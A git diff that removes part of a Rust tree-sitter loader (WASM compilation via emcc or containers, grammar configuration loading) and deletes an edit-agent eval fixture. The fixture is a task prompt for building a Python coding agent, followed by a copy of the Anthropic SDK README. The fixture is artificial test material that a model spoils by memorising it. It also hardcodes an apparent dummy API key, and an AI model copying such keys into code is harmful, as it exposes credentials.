should :) - - // let mut must_have = vec![ - // format!("tree_sitter_{name}_external_scanner_create"), - // format!("tree_sitter_{name}_external_scanner_destroy"), - // format!("tree_sitter_{name}_external_scanner_serialize"), - // format!("tree_sitter_{name}_external_scanner_deserialize"), - // format!("tree_sitter_{name}_external_scanner_scan"), - // ]; - - Ok(()) - } - - pub fn compile_parser_to_wasm( - &self, - language_name: &str, - root_path: Option<&Path>, - src_path: &Path, - scanner_filename: Option<&Path>, - output_path: &Path, - force_docker: bool, - ) -> Result<(), Error> { - #[derive(PartialEq, Eq)] - enum EmccSource { - Native, - Docker, - Podman, - } - - let root_path = root_path.unwrap_or(src_path); - let emcc_name = if cfg!(windows) { "emcc.bat" } else { "emcc" }; - - // Order of preference: emscripten > docker > podman > error - let source = if !force_docker && Command::new(emcc_name).output().is_ok() { - EmccSource::Native - } else if Command::new("docker") - .output() - .is_ok_and(|out| out.status.success()) - { - EmccSource::Docker - } else if Command::new("podman") - .arg("--version") - .output() - .is_ok_and(|out| out.status.success()) - { - EmccSource::Podman - } else { - anyhow::bail!( - "You must have either emcc, docker, or podman on your PATH to run this command" - ); - }; - - let mut command = match source { - EmccSource::Native => { - let mut command = Command::new(emcc_name); - command.current_dir(src_path); - command - } - - EmccSource::Docker | EmccSource::Podman => { - let mut command = match source { - EmccSource::Docker => Command::new("docker"), - EmccSource::Podman => Command::new("podman"), - EmccSource::Native => unreachable!(), - }; - command.args(["run", "--rm"]); - - // The working directory is the directory containing the parser itself - let workdir = if root_path == src_path { - PathBuf::from("/src") - } else { - let mut path = PathBuf::from("/src"); - path.push(src_path.strip_prefix(root_path).unwrap()); - path - }; - command.args(["--workdir", &workdir.to_slash_lossy()]); - - // Mount the root directory as a volume, which is the repo root - let mut volume_string = OsString::from(&root_path); - volume_string.push(":/src:Z"); - command.args([OsStr::new("--volume"), &volume_string]); - - // In case `docker` is an alias to `podman`, ensure that podman - // mounts the current directory as writable by the container - // user which has the same uid as the host user. Setting the - // podman-specific variable is more reliable than attempting to - // detect whether `docker` is an alias for `podman`. - // see https://docs.podman.io/en/latest/markdown/podman-run.1.html#userns-mode - command.env("PODMAN_USERNS", "keep-id"); - - // Get the current user id so that files created in the docker container will have - // the same owner. - #[cfg(unix)] - { - #[link(name = "c")] - extern "C" { - fn getuid() -> u32; - } - // don't need to set user for podman since PODMAN_USERNS=keep-id is already set - if source == EmccSource::Docker { - let user_id = unsafe { getuid() }; - command.args(["--user", &user_id.to_string()]); - } - }; - - // Run `emcc` in a container using the `emscripten-slim` image - command.args([EMSCRIPTEN_TAG, "emcc"]); - command - } - }; - - let output_name = "output.wasm"; - - command.args([ - "-o", - output_name, - "-Os", - "-s", - "WASM=1", - "-s", - "SIDE_MODULE=2", - "-s", - "TOTAL_MEMORY=33554432", - "-s", - "NODEJS_CATCH_EXIT=0", - "-s", - &format!("EXPORTED_FUNCTIONS=[\"_tree_sitter_{language_name}\"]"), - "-fno-exceptions", - "-fvisibility=hidden", - "-I", - ".", - ]); - - if let Some(scanner_filename) = scanner_filename { - command.arg(scanner_filename); - } - - command.arg("parser.c"); - let status = command - .spawn() - .with_context(|| "Failed to run emcc command")? - .wait()?; - anyhow::ensure!(status.success(), "emcc command failed"); - let source_path = src_path.join(output_name); - fs::rename(&source_path, &output_path).with_context(|| { - format!("failed to rename wasm output file from {source_path:?} to {output_path:?}") - })?; - - Ok(()) - } - - #[must_use] - #[cfg(feature = "tree-sitter-highlight")] - pub fn highlight_config_for_injection_string<'a>( - &'a self, - string: &str, - ) -> Option<&'a HighlightConfiguration> { - match self.language_configuration_for_injection_string(string) { - Err(e) => { - eprintln!("Failed to load language for injection string '{string}': {e}",); - None - } - Ok(None) => None, - Ok(Some((language, configuration))) => { - match configuration.highlight_config(language, None) { - Err(e) => { - eprintln!( - "Failed to load property sheet for injection string '{string}': {e}", - ); - None - } - Ok(None) => None, - Ok(Some(config)) => Some(config), - } - } - } - } - - #[must_use] - pub fn get_language_configuration_in_current_path(&self) -> Option<&LanguageConfiguration> { - self.language_configuration_in_current_path - .map(|i| &self.language_configurations[i]) - } - - pub fn find_language_configurations_at_path( - &mut self, - parser_path: &Path, - set_current_path_config: bool, - ) -> Result<&[LanguageConfiguration]> { - let initial_language_configuration_count = self.language_configurations.len(); - - let ts_json = TreeSitterJSON::from_file(parser_path); - if let Ok(config) = ts_json { - let language_count = self.languages_by_id.len(); - for grammar in config.grammars { - // Determine the path to the parser directory. This can be specified in - // the tree-sitter.json, but defaults to the directory containing the - // tree-sitter.json. - let language_path = parser_path.join(grammar.path.unwrap_or(PathBuf::from("."))); - - // Determine if a previous language configuration in this package.json file - // already uses the same language. - let mut language_id = None; - for (id, (path, _, _)) in - self.languages_by_id.iter().enumerate().skip(language_count) - { - if language_path == *path { - language_id = Some(id); - } - } - - // If not, add a new language path to the list. - let language_id = if let Some(language_id) = language_id { - language_id - } else { - self.languages_by_id.push(( - language_path, - OnceCell::new(), - grammar.external_files.clone().into_vec().map(|files| { - files.into_iter() - .map(|path| { - let path = parser_path.join(path); - // prevent p being above/outside of parser_path - anyhow::ensure!(path.starts_with(parser_path), "External file path {path:?} is outside of parser directory {parser_path:?}"); - Ok(path) - }) - .collect::>>() - }).transpose()?, - )); - self.languages_by_id.len() - 1 - }; - - let configuration = LanguageConfiguration { - root_path: parser_path.to_path_buf(), - language_name: grammar.name, - scope: Some(grammar.scope), - language_id, - file_types: grammar.file_types.unwrap_or_default(), - content_regex: Self::regex(grammar.content_regex.as_deref()), - first_line_regex: Self::regex(grammar.first_line_regex.as_deref()), - injection_regex: Self::regex(grammar.injection_regex.as_deref()), - injections_filenames: grammar.injections.into_vec(), - locals_filenames: grammar.locals.into_vec(), - tags_filenames: grammar.tags.into_vec(), - highlights_filenames: grammar.highlights.into_vec(), - #[cfg(feature = "tree-sitter-highlight")] - highlight_config: OnceCell::new(), - #[cfg(feature = "tree-sitter-tags")] - tags_config: OnceCell::new(), - #[cfg(feature = "tree-sitter-highlight")] - highlight_names: &self.highlight_names, - #[cfg(feature = "tree-sitter-highlight")] - use_all_highlight_names: self.use_all_highlight_names, - }; - - for file_type in &configuration.file_types { - self.language_configuration_ids_by_file_type - .entry(file_type.to_string()) - .or_default() - .push(self.language_configurations.len()); - } - if let Some(first_line_regex) = &configuration.first_line_regex { - self.language_configuration_ids_by_first_line_regex - .entry(first_line_regex.to_string()) - .or_default() - .push(self.language_configurations.len()); - } - - self.language_configurations.push(unsafe { - mem::transmute::, LanguageConfiguration<'static>>( - configuration, - ) - }); - - if set_current_path_config && self.language_configuration_in_current_path.is_none() - { - self.language_configuration_in_current_path = - Some(self.language_configurations.len() - 1); - } - } - } else if let Err(e) = ts_json { - match e.downcast_ref::() { - // This is noisy, and not really an issue. - Some(e) if e.kind() == std::io::ErrorKind::NotFound => {} - _ => { - eprintln!( - "Warning: Failed to parse {} -- {e}", - parser_path.join("tree-sitter.json").display() - ); - } - } - } - - // If we didn't find any language configurations in the tree-sitter.json file, - // but there is a grammar.json file, then use the grammar file to form a simple - // language configuration. - if self.language_configurations.len() == initial_language_configuration_count - && parser_path.join("src").join("grammar.json").exists() - { - let grammar_path = parser_path.join("src").join("grammar.json"); - let language_name = Self::grammar_json_name(&grammar_path)?; - let configuration = LanguageConfiguration { - root_path: parser_path.to_owned(), - language_name, - language_id: self.languages_by_id.len(), - file_types: Vec::new(), - scope: None, - content_regex: None, - first_line_regex: None, - injection_regex: None, - injections_filenames: None, - locals_filenames: None, - highlights_filenames: None, - tags_filenames: None, - #[cfg(feature = "tree-sitter-highlight")] - highlight_config: OnceCell::new(), - #[cfg(feature = "tree-sitter-tags")] - tags_config: OnceCell::new(), - #[cfg(feature = "tree-sitter-highlight")] - highlight_names: &self.highlight_names, - #[cfg(feature = "tree-sitter-highlight")] - use_all_highlight_names: self.use_all_highlight_names, - }; - self.language_configurations.push(unsafe { - mem::transmute::, LanguageConfiguration<'static>>( - configuration, - ) - }); - self.languages_by_id - .push((parser_path.to_owned(), OnceCell::new(), None)); - } - - Ok(&self.language_configurations[initial_language_configuration_count..]) - } - - fn regex(pattern: Option<&str>) -> Option { - pattern.and_then(|r| RegexBuilder::new(r).multi_line(true).build().ok()) - } - - fn grammar_json_name(grammar_path: &Path) -> Result { - let file = fs::File::open(grammar_path).with_context(|| { - format!("Failed to open grammar.json at {}", grammar_path.display()) - })?; - - let first_three_lines = BufReader::new(file) - .lines() - .take(3) - .collect::, _>>() - .with_context(|| { - format!( - "Failed to read the first three lines of grammar.json at {}", - grammar_path.display() - ) - })? - .join("\n"); - - let name = GRAMMAR_NAME_REGEX - .captures(&first_three_lines) - .and_then(|c| c.get(1)) - .with_context(|| { - format!("Failed to parse the language name from grammar.json at {grammar_path:?}") - })?; - - Ok(name.as_str().to_string()) - } - - pub fn select_language( - &mut self, - path: &Path, - current_dir: &Path, - scope: Option<&str>, - ) -> Result { - if let Some(scope) = scope { - if let Some(config) = self - .language_configuration_for_scope(scope) - .with_context(|| format!("Failed to load language for scope '{scope}'"))? - { - Ok(config.0) - } else { - anyhow::bail!("Unknown scope '{scope}'") - } - } else if let Some((lang, _)) = self - .language_configuration_for_file_name(path) - .with_context(|| { - format!( - "Failed to load language for file name {}", - path.file_name().unwrap().to_string_lossy() - ) - })? - { - Ok(lang) - } else if let Some(id) = self.language_configuration_in_current_path { - Ok(self.language_for_id(self.language_configurations[id].language_id)?) - } else if let Some(lang) = self - .languages_at_path(current_dir) - .with_context(|| "Failed to load language in current directory")? - .first() - .cloned() - { - Ok(lang.0) - } else if let Some(lang) = self.language_configuration_for_first_line_regex(path)? { - Ok(lang.0) - } else { - anyhow::bail!("No language found"); - } - } - - pub fn debug_build(&mut self, flag: bool) { - self.debug_build = flag; - } - - pub fn sanitize_build(&mut self, flag: bool) { - self.sanitize_build = flag; - } - - pub fn force_rebuild(&mut self, rebuild: bool) { - self.force_rebuild = rebuild; - } - - #[cfg(feature = "wasm")] - #[cfg_attr(docsrs, doc(cfg(feature = "wasm")))] - pub fn use_wasm(&mut self, engine: &tree_sitter::wasmtime::Engine) { - *self.wasm_store.lock().unwrap() = Some(tree_sitter::WasmStore::new(engine).unwrap()); - } - - #[must_use] - pub fn get_scanner_path(&self, src_path: &Path) -> Option { - let path = src_path.join("scanner.c"); - path.exists().then_some(path) - } -} - -impl LanguageConfiguration<'_> { - #[cfg(feature = "tree-sitter-highlight")] - pub fn highlight_config( - &self, - language: Language, - paths: Option<&[PathBuf]>, - ) -> Result> { - let (highlights_filenames, injections_filenames, locals_filenames) = match paths { - Some(paths) => ( - Some( - paths - .iter() - .filter(|p| p.ends_with("highlights.scm")) - .cloned() - .collect::>(), - ), - Some( - paths - .iter() - .filter(|p| p.ends_with("tags.scm")) - .cloned() - .collect::>(), - ), - Some( - paths - .iter() - .filter(|p| p.ends_with("locals.scm")) - .cloned() - .collect::>(), - ), - ), - None => (None, None, None), - }; - self.highlight_config - .get_or_try_init(|| { - let (highlights_query, highlight_ranges) = self.read_queries( - if highlights_filenames.is_some() { - highlights_filenames.as_deref() - } else { - self.highlights_filenames.as_deref() - }, - "highlights.scm", - )?; - let (injections_query, injection_ranges) = self.read_queries( - if injections_filenames.is_some() { - injections_filenames.as_deref() - } else { - self.injections_filenames.as_deref() - }, - "injections.scm", - )?; - let (locals_query, locals_ranges) = self.read_queries( - if locals_filenames.is_some() { - locals_filenames.as_deref() - } else { - self.locals_filenames.as_deref() - }, - "locals.scm", - )?; - - if highlights_query.is_empty() { - Ok(None) - } else { - let mut result = HighlightConfiguration::new( - language, - &self.language_name, - &highlights_query, - &injections_query, - &locals_query, - ) - .map_err(|error| match error.kind { - QueryErrorKind::Language => Error::from(error), - _ => { - if error.offset < injections_query.len() { - Self::include_path_in_query_error( - error, - &injection_ranges, - &injections_query, - 0, - ) - } else if error.offset < injections_query.len() + locals_query.len() { - Self::include_path_in_query_error( - error, - &locals_ranges, - &locals_query, - injections_query.len(), - ) - } else { - Self::include_path_in_query_error( - error, - &highlight_ranges, - &highlights_query, - injections_query.len() + locals_query.len(), - ) - } - } - })?; - let mut all_highlight_names = self.highlight_names.lock().unwrap(); - if self.use_all_highlight_names { - for capture_name in result.query.capture_names() { - if !all_highlight_names.iter().any(|x| x == capture_name) { - all_highlight_names.push((*capture_name).to_string()); - } - } - } - result.configure(all_highlight_names.as_slice()); - drop(all_highlight_names); - Ok(Some(result)) - } - }) - .map(Option::as_ref) - } - - #[cfg(feature = "tree-sitter-tags")] - pub fn tags_config(&self, language: Language) -> Result> { - self.tags_config - .get_or_try_init(|| { - let (tags_query, tags_ranges) = - self.read_queries(self.tags_filenames.as_deref(), "tags.scm")?; - let (locals_query, locals_ranges) = - self.read_queries(self.locals_filenames.as_deref(), "locals.scm")?; - if tags_query.is_empty() { - Ok(None) - } else { - TagsConfiguration::new(language, &tags_query, &locals_query) - .map(Some) - .map_err(|error| { - if let TagsError::Query(error) = error { - if error.offset < locals_query.len() { - Self::include_path_in_query_error( - error, - &locals_ranges, - &locals_query, - 0, - ) - } else { - Self::include_path_in_query_error( - error, - &tags_ranges, - &tags_query, - locals_query.len(), - ) - } - } else { - error.into() - } - }) - } - }) - .map(Option::as_ref) - } - - #[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] - fn include_path_in_query_error( - mut error: QueryError, - ranges: &[(PathBuf, Range)], - source: &str, - start_offset: usize, - ) -> Error { - let offset_within_section = error.offset - start_offset; - let (path, range) = ranges - .iter() - .find(|(_, range)| range.contains(&offset_within_section)) - .unwrap_or_else(|| ranges.last().unwrap()); - error.offset = offset_within_section - range.start; - error.row = source[range.start..offset_within_section] - .matches('\n') - .count(); - Error::from(error).context(format!("Error in query file {}", path.display())) - } - - #[allow(clippy::type_complexity)] - #[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] - fn read_queries( - &self, - paths: Option<&[PathBuf]>, - default_path: &str, - ) -> Result<(String, Vec<(PathBuf, Range)>)> { - let mut query = String::new(); - let mut path_ranges = Vec::new(); - if let Some(paths) = paths { - for path in paths { - let abs_path = self.root_path.join(path); - let prev_query_len = query.len(); - query += &fs::read_to_string(&abs_path) - .with_context(|| format!("Failed to read query file {}", path.display()))?; - path_ranges.push((path.clone(), prev_query_len..query.len())); - } - } else { - // highlights.scm is needed to test highlights, and tags.scm to test tags - if default_path == "highlights.scm" || default_path == "tags.scm" { - eprintln!( - indoc! {" - Warning: you should add a `{}` entry pointing to the highlights path in the `tree-sitter` object in the grammar's tree-sitter.json file. - See more here: https://tree-sitter.github.io/tree-sitter/3-syntax-highlighting#query-paths - "}, - default_path.replace(".scm", "") - ); - } - let queries_path = self.root_path.join("queries"); - let path = queries_path.join(default_path); - if path.exists() { - query = fs::read_to_string(&path) - .with_context(|| format!("Failed to read query file {}", path.display()))?; - path_ranges.push((PathBuf::from(default_path), 0..query.len())); - } - } - - Ok((query, path_ranges)) - } -} - -fn needs_recompile(lib_path: &Path, paths_to_check: &[PathBuf]) -> Result { - if !lib_path.exists() { - return Ok(true); - } - let lib_mtime = mtime(lib_path) - .with_context(|| format!("Failed to read mtime of {}", lib_path.display()))?; - for path in paths_to_check { - if mtime(path)? > lib_mtime { - return Ok(true); - } - } - Ok(false) -} - -fn mtime(path: &Path) -> Result { - Ok(fs::metadata(path)?.modified()?) -} - -fn replace_dashes_with_underscores(name: &str) -> String { - let mut result = String::with_capacity(name.len()); - for c in name.chars() { - if c == '-' { - result.push('_'); - } else { - result.push(c); - } - } - result -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/zode/prompt.md b/crates/agent/src/edit_agent/evals/fixtures/zode/prompt.md deleted file mode 100644 index 29755d441f7a4f..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/zode/prompt.md +++ /dev/null @@ -1,2193 +0,0 @@ -- We're building a CLI code agent tool called Zode that is intended to work like Aider or Claude code -- We're starting from a completely blank project -- Like Aider/Claude Code you take the user's initial prompt and then call the LLM and perform tool calls in a loop until the ultimate goal is achieved. -- Unlike Aider or Claude code, it's not intended to be interactive. Once the initial prompt is passed in, there will be no further input from the user. -- The system you will build must reach the stated goal just by performing tool calls and calling the LLM -- I want you to build this in python. Use the anthropic python sdk and the model context protocol sdk. Use a virtual env and pip to install dependencies -- Follow the anthropic guidance on tool calls: https://docs.anthropic.com/en/docs/build-with-claude/tool-use/overview -- Use this Anthropic model: `claude-3-7-sonnet-20250219` -- Use this Anthropic API Key: `sk-ant-api03-qweeryiofdjsncmxquywefidopsugus` -- One of the most important pieces to this is having good tool calls. We will be using the tools provided by the Claude MCP server. You can start this server using `claude mcp serve` and then you will need to write code that acts as an MCP **client** to connect to this mcp server via MCP. Likely you want to start this using a subprocess. The JSON schema showing the tools available via this sdk are available below. Via this MCP server you have access to all the tools that zode needs: Bash, GlobTool, GrepTool, LS, View, Edit, Replace, WebFetchTool -- The cli tool should be invocable via python zode.py file.md where file.md is any possible file that contains the users prompt. As a reminder, there will be no further input from the user after this initial prompt. Zode must take it from there and call the LLM and tools until the user goal is accomplished -- Try and keep all code in zode.py and make heavy use of the asks I mentioned -- Once you’ve implemented this, you must run python zode.py eval/instructions.md to see how well our new agent tool does! - -Anthropic Python SDK README: -``` -# Anthropic Python API library - -[![PyPI version](https://img.shields.io/pypi/v/anthropic.svg)](https://pypi.org/project/anthropic/) - -The Anthropic Python library provides convenient access to the Anthropic REST API from any Python 3.8+ -application. It includes type definitions for all request params and response fields, -and offers both synchronous and asynchronous clients powered by [httpx](https://github.com/encode/httpx). - -## Documentation - -The REST API documentation can be found on [docs.anthropic.com](https://docs.anthropic.com/claude/reference/). The full API of this library can be found in [api.md](api.md). - -## Installation - -```sh -# install from PyPI -pip install anthropic -``` - -## Usage - -The full API of this library can be found in [api.md](api.md). - -```python -import os -from anthropic import Anthropic - -client = Anthropic( - api_key=os.environ.get("ANTHROPIC_API_KEY"), # This is the default and can be omitted -) - -message = client.messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", -) -print(message.content) -``` - -While you can provide an `api_key` keyword argument, -we recommend using [python-dotenv](https://pypi.org/project/python-dotenv/) -to add `ANTHROPIC_API_KEY="my-anthropic-api-key"` to your `.env` file -so that your API Key is not stored in source control. - -## Async usage - -Simply import `AsyncAnthropic` instead of `Anthropic` and use `await` with each API call: - -```python -import os -import asyncio -from anthropic import AsyncAnthropic - -client = AsyncAnthropic( - api_key=os.environ.get("ANTHROPIC_API_KEY"), # This is the default and can be omitted -) - - -async def main() -> None: - message = await client.messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", - ) - print(message.content) - - -asyncio.run(main()) -``` - -Functionality between the synchronous and asynchronous clients is otherwise identical. - -## Streaming responses - -We provide support for streaming responses using Server Side Events (SSE). - -```python -from anthropic import Anthropic - -client = Anthropic() - -stream = client.messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", - stream=True, -) -for event in stream: - print(event.type) -``` - -The async client uses the exact same interface. - -```python -from anthropic import AsyncAnthropic - -client = AsyncAnthropic() - -stream = await client.messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", - stream=True, -) -async for event in stream: - print(event.type) -``` - -### Streaming Helpers - -This library provides several conveniences for streaming messages, for example: - -```py -import asyncio -from anthropic import AsyncAnthropic - -client = AsyncAnthropic() - -async def main() -> None: - async with client.messages.stream( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Say hello there!", - } - ], - model="claude-3-5-sonnet-latest", - ) as stream: - async for text in stream.text_stream: - print(text, end="", flush=True) - print() - - message = await stream.get_final_message() - print(message.to_json()) - -asyncio.run(main()) -``` - -Streaming with `client.messages.stream(...)` exposes [various helpers for your convenience](helpers.md) including accumulation & SDK-specific events. - -Alternatively, you can use `client.messages.create(..., stream=True)` which only returns an async iterable of the events in the stream and thus uses less memory (it does not build up a final message object for you). - -## Token counting - -To get the token count for a message without creating it you can use the `client.beta.messages.count_tokens()` method. This takes the same `messages` list as the `.create()` method. - -```py -count = client.beta.messages.count_tokens( - model="claude-3-5-sonnet-20241022", - messages=[ - {"role": "user", "content": "Hello, world"} - ] -) -count.input_tokens # 10 -``` - -You can also see the exact usage for a given request through the `usage` response property, e.g. - -```py -message = client.messages.create(...) -message.usage -# Usage(input_tokens=25, output_tokens=13) -``` - -## Message Batches - -This SDK provides beta support for the [Message Batches API](https://docs.anthropic.com/en/docs/build-with-claude/message-batches) under the `client.beta.messages.batches` namespace. - - -### Creating a batch - -Message Batches take the exact same request params as the standard Messages API: - -```python -await client.beta.messages.batches.create( - requests=[ - { - "custom_id": "my-first-request", - "params": { - "model": "claude-3-5-sonnet-latest", - "max_tokens": 1024, - "messages": [{"role": "user", "content": "Hello, world"}], - }, - }, - { - "custom_id": "my-second-request", - "params": { - "model": "claude-3-5-sonnet-latest", - "max_tokens": 1024, - "messages": [{"role": "user", "content": "Hi again, friend"}], - }, - }, - ] -) -``` - - -### Getting results from a batch - -Once a Message Batch has been processed, indicated by `.processing_status === 'ended'`, you can access the results with `.batches.results()` - -```python -result_stream = await client.beta.messages.batches.results(batch_id) -async for entry in result_stream: - if entry.result.type == "succeeded": - print(entry.result.message.content) -``` - -## Tool use - -This SDK provides support for tool use, aka function calling. More details can be found in [the documentation](https://docs.anthropic.com/claude/docs/tool-use). - -## AWS Bedrock - -This library also provides support for the [Anthropic Bedrock API](https://aws.amazon.com/bedrock/claude/) if you install this library with the `bedrock` extra, e.g. `pip install -U anthropic[bedrock]`. - -You can then import and instantiate a separate `AnthropicBedrock` class, the rest of the API is the same. - -```py -from anthropic import AnthropicBedrock - -client = AnthropicBedrock() - -message = client.messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello!", - } - ], - model="anthropic.claude-3-5-sonnet-20241022-v2:0", -) -print(message) -``` - -The bedrock client supports the following arguments for authentication - -```py -AnthropicBedrock( - aws_profile='...', - aws_region='us-east' - aws_secret_key='...', - aws_access_key='...', - aws_session_token='...', -) -``` - -For a more fully fledged example see [`examples/bedrock.py`](https://github.com/anthropics/anthropic-sdk-python/blob/main/examples/bedrock.py). - -## Google Vertex - -This library also provides support for the [Anthropic Vertex API](https://cloud.google.com/vertex-ai?hl=en) if you install this library with the `vertex` extra, e.g. `pip install -U anthropic[vertex]`. - -You can then import and instantiate a separate `AnthropicVertex`/`AsyncAnthropicVertex` class, which has the same API as the base `Anthropic`/`AsyncAnthropic` class. - -```py -from anthropic import AnthropicVertex - -client = AnthropicVertex() - -message = client.messages.create( - model="claude-3-5-sonnet-v2@20241022", - max_tokens=100, - messages=[ - { - "role": "user", - "content": "Hello!", - } - ], -) -print(message) -``` - -For a more complete example see [`examples/vertex.py`](https://github.com/anthropics/anthropic-sdk-python/blob/main/examples/vertex.py). - -## Using types - -Nested request parameters are [TypedDicts](https://docs.python.org/3/library/typing.html#typing.TypedDict). Responses are [Pydantic models](https://docs.pydantic.dev) which also provide helper methods for things like: - -- Serializing back into JSON, `model.to_json()` -- Converting to a dictionary, `model.to_dict()` - -Typed requests and responses provide autocomplete and documentation within your editor. If you would like to see type errors in VS Code to help catch bugs earlier, set `python.analysis.typeCheckingMode` to `basic`. - -## Pagination - -List methods in the Anthropic API are paginated. - -This library provides auto-paginating iterators with each list response, so you do not have to request successive pages manually: - -```python -from anthropic import Anthropic - -client = Anthropic() - -all_batches = [] -# Automatically fetches more pages as needed. -for batch in client.beta.messages.batches.list( - limit=20, -): - # Do something with batch here - all_batches.append(batch) -print(all_batches) -``` - -Or, asynchronously: - -```python -import asyncio -from anthropic import AsyncAnthropic - -client = AsyncAnthropic() - - -async def main() -> None: - all_batches = [] - # Iterate through items across all pages, issuing requests as needed. - async for batch in client.beta.messages.batches.list( - limit=20, - ): - all_batches.append(batch) - print(all_batches) - - -asyncio.run(main()) -``` - -Alternatively, you can use the `.has_next_page()`, `.next_page_info()`, or `.get_next_page()` methods for more granular control working with pages: - -```python -first_page = await client.beta.messages.batches.list( - limit=20, -) -if first_page.has_next_page(): - print(f"will fetch next page using these details: {first_page.next_page_info()}") - next_page = await first_page.get_next_page() - print(f"number of items we just fetched: {len(next_page.data)}") - -# Remove `await` for non-async usage. -``` - -Or just work directly with the returned data: - -```python -first_page = await client.beta.messages.batches.list( - limit=20, -) - -print(f"next page cursor: {first_page.last_id}") # => "next page cursor: ..." -for batch in first_page.data: - print(batch.id) - -# Remove `await` for non-async usage. -``` - -## Handling errors - -When the library is unable to connect to the API (for example, due to network connection problems or a timeout), a subclass of `anthropic.APIConnectionError` is raised. - -When the API returns a non-success status code (that is, 4xx or 5xx -response), a subclass of `anthropic.APIStatusError` is raised, containing `status_code` and `response` properties. - -All errors inherit from `anthropic.APIError`. - -```python -import anthropic -from anthropic import Anthropic - -client = Anthropic() - -try: - client.messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", - ) -except anthropic.APIConnectionError as e: - print("The server could not be reached") - print(e.__cause__) # an underlying Exception, likely raised within httpx. -except anthropic.RateLimitError as e: - print("A 429 status code was received; we should back off a bit.") -except anthropic.APIStatusError as e: - print("Another non-200-range status code was received") - print(e.status_code) - print(e.response) -``` - -Error codes are as follows: - -| Status Code | Error Type | -| ----------- | -------------------------- | -| 400 | `BadRequestError` | -| 401 | `AuthenticationError` | -| 403 | `PermissionDeniedError` | -| 404 | `NotFoundError` | -| 422 | `UnprocessableEntityError` | -| 429 | `RateLimitError` | -| >=500 | `InternalServerError` | -| N/A | `APIConnectionError` | - -## Request IDs - -> For more information on debugging requests, see [these docs](https://docs.anthropic.com/en/api/errors#request-id) - -All object responses in the SDK provide a `_request_id` property which is added from the `request-id` response header so that you can quickly log failing requests and report them back to Anthropic. - -```python -message = client.messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", -) -print(message._request_id) # req_018EeWyXxfu5pfWkrYcMdjWG -``` - -Note that unlike other properties that use an `_` prefix, the `_request_id` property -*is* public. Unless documented otherwise, *all* other `_` prefix properties, -methods and modules are *private*. - -### Retries - -Certain errors are automatically retried 2 times by default, with a short exponential backoff. -Connection errors (for example, due to a network connectivity problem), 408 Request Timeout, 409 Conflict, -429 Rate Limit, and >=500 Internal errors are all retried by default. - -You can use the `max_retries` option to configure or disable retry settings: - -```python -from anthropic import Anthropic - -# Configure the default for all requests: -client = Anthropic( - # default is 2 - max_retries=0, -) - -# Or, configure per-request: -client.with_options(max_retries=5).messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", -) -``` - -### Timeouts - -By default requests time out after 10 minutes. You can configure this with a `timeout` option, -which accepts a float or an [`httpx.Timeout`](https://www.python-httpx.org/advanced/timeouts/#fine-tuning-the-configuration) object: - -```python -from anthropic import Anthropic - -# Configure the default for all requests: -client = Anthropic( - # 20 seconds (default is 10 minutes) - timeout=20.0, -) - -# More granular control: -client = Anthropic( - timeout=httpx.Timeout(60.0, read=5.0, write=10.0, connect=2.0), -) - -# Override per-request: -client.with_options(timeout=5.0).messages.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", -) -``` - -On timeout, an `APITimeoutError` is thrown. - -Note that requests that time out are [retried twice by default](#retries). - -### Long Requests - -> [!IMPORTANT] -> We highly encourage you use the streaming [Messages API](#streaming-responses) for longer running requests. - -We do not recommend setting a large `max_tokens` values without using streaming. -Some networks may drop idle connections after a certain period of time, which -can cause the request to fail or [timeout](#timeouts) without receiving a response from Anthropic. - -This SDK will also throw a `ValueError` if a non-streaming request is expected to be above roughly 10 minutes long. -Passing `stream=True` or [overriding](#timeouts) the `timeout` option at the client or request level disables this error. - -An expected request latency longer than the [timeout](#timeouts) for a non-streaming request -will result in the client terminating the connection and retrying without receiving a response. - -We set a [TCP socket keep-alive](https://tldp.org/HOWTO/TCP-Keepalive-HOWTO/overview.html) option in order -to reduce the impact of idle connection timeouts on some networks. -This can be [overridden](#Configuring-the-HTTP-client) by passing a `http_client` option to the client. - -## Default Headers - -We automatically send the `anthropic-version` header set to `2023-06-01`. - -If you need to, you can override it by setting default headers per-request or on the client object. - -Be aware that doing so may result in incorrect types and other unexpected or undefined behavior in the SDK. - -```python -from anthropic import Anthropic - -client = Anthropic( - default_headers={"anthropic-version": "My-Custom-Value"}, -) -``` - -## Advanced - -### Logging - -We use the standard library [`logging`](https://docs.python.org/3/library/logging.html) module. - -You can enable logging by setting the environment variable `ANTHROPIC_LOG` to `info`. - -```shell -$ export ANTHROPIC_LOG=info -``` - -Or to `debug` for more verbose logging. - -### How to tell whether `None` means `null` or missing - -In an API response, a field may be explicitly `null`, or missing entirely; in either case, its value is `None` in this library. You can differentiate the two cases with `.model_fields_set`: - -```py -if response.my_field is None: - if 'my_field' not in response.model_fields_set: - print('Got json like {}, without a "my_field" key present at all.') - else: - print('Got json like {"my_field": null}.') -``` - -### Accessing raw response data (e.g. headers) - -The "raw" Response object can be accessed by prefixing `.with_raw_response.` to any HTTP method call, e.g., - -```py -from anthropic import Anthropic - -client = Anthropic() -response = client.messages.with_raw_response.create( - max_tokens=1024, - messages=[{ - "role": "user", - "content": "Hello, Claude", - }], - model="claude-3-5-sonnet-latest", -) -print(response.headers.get('X-My-Header')) - -message = response.parse() # get the object that `messages.create()` would have returned -print(message.content) -``` - -These methods return a 